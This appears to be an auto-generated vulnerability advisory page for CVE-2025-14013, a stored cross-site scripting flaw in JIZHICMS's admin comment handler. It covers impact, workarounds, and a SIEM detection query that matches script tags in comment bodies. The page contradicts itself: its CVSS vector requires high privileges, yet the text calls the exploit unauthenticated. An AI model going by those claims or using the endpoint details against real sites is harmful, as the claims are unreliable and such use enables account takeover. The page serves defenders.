Login Sign Up

CVE-2025-14013

2.4 LOW
Cross-Site Scripting

📋 TL;DR

This vulnerability allows attackers to inject malicious scripts into JIZHICMS comment sections through the body parameter. When administrators view these comments, the scripts execute in their browser context, potentially compromising admin accounts. All JIZHICMS installations up to version 2.5.5 with the comment handler enabled are affected.

💻 Affected Systems

Products:
  • JIZHICMS
Versions: up to 2.5.5
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires comment functionality to be enabled. The vulnerability exists in the admin comment handler at /index.php/admins/Comment/addcomment.html.

📦 What is this software?

Jizhicms by Jizhicms

View all CVEs affecting Jizhicms →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Administrator account takeover leading to complete CMS compromise, data theft, or website defacement.

🟠

Likely Case

Session hijacking of admin accounts, allowing unauthorized content modification or privilege escalation.

🟢

If Mitigated

No impact if input validation and output encoding are properly implemented.

🌐 Internet-Facing: HIGH - Attack can be initiated remotely without authentication.
🏢 Internal Only: MEDIUM - Requires admin interaction but can be exploited from internal networks.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Public exploit details available on GitHub. Attack requires admin to view malicious comments.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: No

Instructions:

No official patch available. Consider upgrading if vendor releases fix, or implement workarounds.

🔧 Temporary Workarounds

Input Validation and Output Encoding

all

Implement server-side validation and HTML encoding for all user inputs in comment body fields.

Modify /index.php/admins/Comment/addcomment.html to sanitize body parameter input

Disable Comment Handler

all

Temporarily disable the vulnerable comment functionality until patch is available.

Comment out or remove comment handler routes in CMS configuration

🧯 If You Can't Patch

  • Implement Content Security Policy (CSP) headers to restrict script execution
  • Use web application firewall (WAF) rules to block XSS payloads in comment parameters

🔍 How to Verify

Check if Vulnerable:

Check if JIZHICMS version is 2.5.5 or earlier and comment functionality is enabled.

Check Version:

Check CMS version in admin panel or configuration files.

Verify Fix Applied:

Test comment submission with XSS payloads; verify they are properly sanitized or blocked.

📡 Detection & Monitoring

Log Indicators:

  • Unusual comment submissions with script tags or JavaScript code
  • Multiple comment attempts with encoded payloads

Network Indicators:

  • POST requests to /index.php/admins/Comment/addcomment.html with suspicious body parameters

SIEM Query:

source="web_logs" AND uri="/index.php/admins/Comment/addcomment.html" AND (body CONTAINS "<script>" OR body CONTAINS "javascript:")

📊 Metadata

CVE ID: CVE-2025-14013
CVSS v3 Score: 2.4 (LOW)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N
CWE: CWE-79
EPSS Score: 0.04% exploit probability (13th percentile)
Published: December 4, 2025
Last Updated: December 10, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-14013, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)